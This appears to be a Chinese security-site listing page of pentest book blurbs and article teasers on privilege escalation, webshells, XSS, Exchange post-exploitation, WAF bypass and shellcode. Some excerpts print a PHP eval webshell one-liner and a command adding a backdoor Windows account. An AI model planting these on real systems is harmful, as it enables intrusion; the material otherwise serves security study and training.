Metasploit渗透测试指南.pdf 带书签版 电子书下载

Metasploit渗透测试指南.pdf 带书签版

内容简介 《Metasploit渗透测试指南》介绍Metasploit——近年来强大、流行和有发展前途的开源渗透测试平台软件,以及基于Metasploit进行网络渗透测试与安全漏洞研究分析的技术、流程和方法。 本书共有17章,覆盖了渗透测试的情报搜集、威胁建模、漏洞分析、渗透攻击和后渗透攻击各个环节,并包含了免杀技术、客户端渗透攻击、社会工程学、自动化渗透测试、无线网络攻击等高级技术专题,以及如何扩展Metasploit情报搜集、渗透攻击与后渗透攻击功能的实践方法,本书一步一个台阶地帮助初学者从零开始建立起作为渗透测试者的基本技能,也为职业的渗透测试工...
最新
阅读全文
SQL注入攻击与防御(第2版).pdf 电子书下载

SQL注入攻击与防御(第2版).pdf

内容简介 《SQL注入攻击与防御(第2版)/安全技术经典译丛》致力于深入探讨SQL注入问题。《SQL注入攻击与防御(第2版)》前一版荣获2009Bejtlich图书奖,第2版对内容做了全面更新,融入了一些新的研究成果,包括如何在移动设备上利用SQL注入漏洞,以及客户端SQL注入等。《SQL注入攻击与防御(第2版)》由一批SQL注入专家编写,他们对Oracle、SQLServer、MySQL和PostgreSQL数据库平台的SQL注入问题具有独到的见解。主要内容:发现、确认和自动发现SQL注入漏洞;通过SQL注入利用漏洞;在代码中发现SQL注入的方法和技巧...
阅读全文
白帽子讲Web安全.pdf 电子书下载

白帽子讲Web安全.pdf

内容简介 互联网时代的数据安全与个人隐私受到挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?《白帽子讲Web安全(纪念版)》将带你走进Web安全的世界,让你了解Web安全的方方面面。黑客不再神秘,攻击技术原来如此,小网站也能找到适合自己的安全道路。大公司如何做安全,为什么要选择这样的方案呢?在《白帽子讲Web安全(纪念版)》中都能找到答案。详细的剖析,让你不仅能“知其然”,更能“知其所以然”。 《白帽子讲Web安全(纪念版)》根据安全宝副总裁吴翰清之前在互联网公司若干年的实际工作经验而写成,在解决方案上具有极强的可操作性;深...
阅读全文
《Web前端黑客技术揭秘》.pdf下载 带书签版 电子书下载

《Web前端黑客技术揭秘》.pdf下载 带书签版

《Web前端黑客技术揭秘》编著者钟晨鸣、徐少培。 Web前端的黑客攻防技术是一门非常新颖且有趣的黑客技术,主要包含 Web前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三 大类,涉及的知识点涵盖信任与信任关系、Cookie安全、FlaSh安全、DOM 渲染、字符集、跨域、原生态攻击、高级钓鱼、蠕虫思想等,这些都是研 究前端安全的人必备的知识点。本书作者深入剖析了许多经典的攻防技巧 ,并给出了许多独到的安全见解。 《Web前端黑客技术揭秘》适合前端工程师阅读,同时 也适合对Web前端各类安全问题或黑客攻防过程充满好奇的读者阅读,书中 的内容可以让读者重新认识到We...
阅读全文
Enumy:一款功能强大的Linux后渗透提权枚举工具 神兵利器

Enumy:一款功能强大的Linux后渗透提权枚举工具

Enumy Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enumy运行之后将能够帮助研究人员枚举出目标设备中常见的安全漏洞。 哪些人应该使用Enumy 1、渗透测试人员,可以在目标设备上运行Enumy,并报告发现的安全问题; 2、CTF玩家可以利用Enumy来识别他们原本可能会错过或忽略的东西; 3、想识别本地设备中安全漏洞的话,同样可以使用Enumy; 工具安装 ...
阅读全文
图解利用虚函数过GS保护 代码审计

图解利用虚函数过GS保护

前言 个人感觉利用虚函数过GS保护过程稍微会复杂些,因为涉及到多次跳转。为了写清楚利用虚函数过GS,本文从payload构造切入,着重描写payload构建过程,从而让读者明白利用虚函数过GS的细节;并且在payload构建过程,对跳转细节采用图解方式,让读者跳出代码,先理清楚整个逻辑关系,然后再载入payload,讲解整个payload运行过程。(需要说明的是文中的寻址图,仅仅为了更清楚的描述跳转过程,不完全代码在内存中的存储顺序)。balabala~~新手上路,请多多关爱,如有写的不好的地方,请轻喷,感谢!╮(╯▽╰)╭ 一、GS保护 我们知道普通的栈溢出漏洞是通...
阅读全文
Windows 权限提升 提权教程

Windows 权限提升

Windows 内核漏洞提权 参考: windows-kernel-exploits 微软安全公告 渗透测试小技巧一:寻找EXP Windows 内核漏洞的关键是目标系统没有安装补丁,如何查询目标系统是否安装补丁? 1 2 3 4 5 #查看本地系统补丁 systeminfo |findstr "KB" wmic qfe get Caption,Description,HotFixID,InstalledOn #另外两种远程查询的方式需要结合其他远程执行方式,例如 wmi...
阅读全文
python cms审计记录 代码审计

python cms审计记录

实战操作 PyOne 命令执行 \app\admin\base_view.py \app\admin\function.py cmd_dict={ 'upgrade':"cd {} && git pull origin master && bash update.sh".format(config_dir), 'running_log':'tail -30f {}/logs/PyOne.{}.log'.format(config_dir,'running'), 'error_log':'tail -30f {}/log...
阅读全文
渗透测试指南(四)有线无线网络利用 渗透测试

渗透测试指南(四)有线无线网络利用

渗透测试指南系列文章内容纲要     第一章 渗透测试简介     第二章 前期交互     第三章 信息收集     第四章 漏洞识别     第五章 社会工程学     第六章 有线/无线网络利用     第七章 基于应用的漏洞利用     第八章 基于本地主机和物理的利用     第九章 后-利用 技术  ...
阅读全文
渗透测试指南(三)社会工程学 社会工程学

渗透测试指南(三)社会工程学

渗透测试指南系列文章内容纲要     第一章 渗透测试简介     第二章 前期交互     第三章 信息收集     第四章 漏洞识别     第五章 社会工程学     第六章 有线/无线网络利用     第七章 基于应用的漏洞利用     第八章 基于本地主机和物理的利用     第九章 后-利用 技术  ...
阅读全文
渗透测试技术研究(二)信息收集 + 漏洞评估 渗透测试

渗透测试技术研究(二)信息收集 + 漏洞评估

系列文章内容纲要 第一章 渗透测试简介 第二章 前期交互 第三章 信息收集 第四章 漏洞识别 第五章 社会工程学 第六章 有线/无线网络利用 第七章 基于应用的漏洞利用 第八章 基于本地主机和物理的利用 第九章 后-利用 技术 第十章 渗透测试工具集介绍 第十一章 渗透报告 第三章 信息收集 接到渗透测试任务,首先要做的就是信息收集(Information Gathering)或者...
阅读全文
渗透测试指南(一)前期交互 渗透测试

渗透测试指南(一)前期交互

2020年初,我通过了准备已久的Pentest+认证考试。我还写了一篇 考试指南,有兴趣的读者可以点击查看。 近期我打算花一点时间把Pentest+知识体系整理成一系列文章,巩固一下我对渗透测试的理解以及加深我对渗透测试的看法。 这一系列文章的大体内容纲要如下 第一章 渗透测试简介 第二章 前期交互 第三章 信息收集 第四章 漏洞识别 第五章 社会工程学 第六章 有线/无线网络利用 第七章 基于应用的漏洞利用 第八章 基于本地主机和物理的利用 第九章 后-利用 技术 第十章 渗透测试工具集介绍 第十一章 渗透报告 话不多说,直接进入第一个主...
阅读全文
挖洞经验 | 头像上传构造存储型XSS技术分析 渗透测试

挖洞经验 | 头像上传构造存储型XSS技术分析

本文中,作者在测试某Web目标站点APP的过程中,通过其中的用户头像上传功能,可以成功上传并加载HTML文件,进步利用该HTML文件可以形成存储型XSS攻击,读取用户的密码信息。我们一起来看看其利用姿势。 漏洞发现 当我注册登录了目标站点APP之后,经过对用户设置项的检查后发现,其中存在一个用户头像上传功能,如下: 于是,我就用Burp对该上传功能进行抓包分析: 请注意,这里我用到了PATCH请求操作,可见其中的ProfilePicture参数为一串base64编码的图像化字串,另外,之前的ProfilePictureMIME参数为image/p...
阅读全文
技术讨论 | Exchange后渗透分析下篇 渗透测试

技术讨论 | Exchange后渗透分析下篇

上回我们说到,通过ruler可以给已知用户名、口令的用户增加规则,从而在使用Outlook连接Exchange邮箱服务器的主机上做到任意代码执行。那么问题来了,如果不知道该用户的口令,能否控制他们的主机呢? 数据包分析 首先需要明白ruler的具体实现过程和原理,到底是如何给其他用户增加规则、修改主页、发送form的。但是大致上我们可以猜测是给Exchange服务器对应的接口发送了几个数据包做到的。 这些数据包发送到了哪个接口,需要从接口处获得什么作为返回,以便进行下一次的请求。 因此需要对ruler的源码进行阅读同时结合对它发数据包的分析弄清楚整个的流程。 ...
阅读全文
利用WAF进行拒绝服务攻击 渗透测试

利用WAF进行拒绝服务攻击

一、拒绝服务攻击 拒绝服务攻击,英文名称是Denial of Service. 简称DOS,即拒绝服务,造成其攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。 最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽, 最后导致合法的用户请求无法通过。 常规的dos攻击 由黑客控制多台服务器,让这多台服务器同时去请求一个目标机器,导致目标资源耗尽。 二、WAF 也称为:网站应用级入侵...
阅读全文
CVE-2020-5410 Spring Cloud Config目录穿越漏洞 渗透测试

CVE-2020-5410 Spring Cloud Config目录穿越漏洞

漏洞描述 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 Spring cloud Config已经出现过两次目录穿越漏洞,分别是CVE-2019-3799和CVE-2020-5405,可参考之前的文章:https://xz.aliyun.com/t/7558。 漏洞补丁 这次补丁主要是两个部分,第一个部分是将对路径的检测方法...
阅读全文
各种提权姿势总结 提权教程

各种提权姿势总结

提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia /add 4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进...
阅读全文
【奇技淫巧】记一次实战access注入绕过安全狗 渗透测试

【奇技淫巧】记一次实战access注入绕过安全狗

网站存在注入点地方 当时测试了布尔盲注,发现有安全狗waf 对其fuzz一波,发现数据库时access数据库 由于access数据不能使用注释,并且没有数据库,幸好是安全狗,绕过方法如下 因为安全狗是对整段url进行检查,发现aa参数和bb参数包裹的是注释所以放过 其他页面也存在注入点 ...
阅读全文
菜刀连接PHP WebShell返回200错误 渗透测试

菜刀连接PHP WebShell返回200错误

错误详情 WebShell内容: <?php     @eval($_POST['cmd']); ?> 1 2 3 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句话Shell中的@符号去掉,会提示:Cannot call assert() with s...
阅读全文
Java命令注入原理并结合Java Instrument技术 渗透测试

Java命令注入原理并结合Java Instrument技术

一、前言 命令注入:恶意用户构造恶意请求,对一些执行系统命令的功能点进行构造注入,从而达到执行命令的效果。 二、演示环境搭建 这里采用springboot+swagger搭建一个模拟的web环境:启动成功后访问:http://localhost:8090/swagger-ui.html#/commandi主要有三个接口: 1 /command/exec/string 主要实现Runtime.getRuntime().exec() 入参为String 2 /command/exec/array 主要实现Runtime.getRuntime().exec() 入参为S...
阅读全文
简述获取shellcode的几种方式 渗透测试

简述获取shellcode的几种方式

0×00 shellcode简介 在攻击中,shellcode是一段用于利用软件漏洞的有效负载,shellcode是16进制的机器码,以其经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在寄存器eip溢出后,放入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 shellcode可以按照攻击者控制是否在目标机器上执行载荷分为本地shellcode和远程shellcode。本地运行的shellcode经常用于在攻击者对计算机的访问权限有限,需要利用软件漏洞提升权限;远程shellcode常用于攻击者以运行在某个网络中的另一台机...
阅读全文
一行代码引来的安全漏洞就让我们丢失了整个服务器的控制权 渗透测试

一行代码引来的安全漏洞就让我们丢失了整个服务器的控制权

之前在某厂的某次项目开发中,项目组同学设计和实现了一个“引以为傲”,额,有点扩张,不过自认为还说得过去的 feature,结果临上线前被啪啪打脸,因为实现过程中因为一行代码(没有标题党,真的是一行代码)带来的安全漏洞让我们丢失了整个服务器控制权(测试环境)。多亏了上线之前有公司安全团队的人会对代码进行扫描,才让这个漏洞被扼杀在摇篮里。 背景说明 我们的项目是一个面向全球用户的 Web 项目,用 SpringBoot 开发。在项目开发过程中,离不开各种异常信息的处理,比如表单提交参数不符合预期,业务逻辑的处理时离不开各种异常信息(例如网络抖动等)的处理。于是利用 SpringBoot ...
阅读全文
HW弹药库之红队作战手册 渗透测试

HW弹药库之红队作战手册

上个月5月9号发了两个HW红方弹药库的,今天再来发一个红队作战人员手册,我大概看了看手册里面的exp零组文档包含了很多, 本文来自 klionsec的github 说明 以下仅针对日常 "红队" 场景, 进行了一次相对全面完整的实战攻击利用技术提炼汇总 针对不同的渗透阶段,所可能会用到的一些技术都做了详尽梳理说明 (后面可能还会整理出对应的完整工具链,虽然那不是最主要的) 由于红队不同于一般的渗透测试, 强调更多的是如何搞进去拿到相应机器权限 或者 实现某特定目的 而不局限于你一定要在什么时间, 用什么技术 或者 必须通过什么途径去搞,相比传统渗透测试,红队则更趋于真实的...
阅读全文
实战笔记—滑动验证码攻防对抗 渗透测试

实战笔记—滑动验证码攻防对抗

一、背景介绍   在业务安全领域,滑动验证码已经是国内继传统字符型验证码之后的标配。众所周知,打码平台和机器学习这两种绕过验证码的方式,已经是攻击者很主流的思路,不再阐述。本文介绍的是一个冷门的绕过思路和防御方案。这些积累,均来自于实战之中,希望有用。 二、思路介绍 知己知彼,百战不殆。     如果不清楚攻击者的手段,又如何能制定防御方案?     滑动验证码绕过思路 漏洞名字:session参数重复校验漏洞 思路介绍: 此思路来源于一次对黑产路径的溯...
阅读全文
2020应急响应实战指南 渗透测试

2020应急响应实战指南

攻防攻防,有攻就有防,我们常说“未知攻焉知防”,所以一般来说,在安服团队里,应急响应是由有经验的渗透测试人员来承担;而在企业里面,应急响应则是由比较有经验的运维人员来承担。 早在17年的时候,我将自己经手处理过的一些应急响应案例,脱敏保留特定场景,整理成了一份应急响应实战笔记分享给团队的小伙伴,后来我把它上传到GitHub,目前star已超过2k+ 。 这阵子,我重新对这份笔记进行编排,并增加了部分章节,使之更完善一点。 这份应急响应笔记,我将它分为技巧篇和实战篇。技巧篇,分享了各种入侵排查、日志分析、权限维持的技巧;实战篇,分享了各种window和Linux病毒木马处理...
阅读全文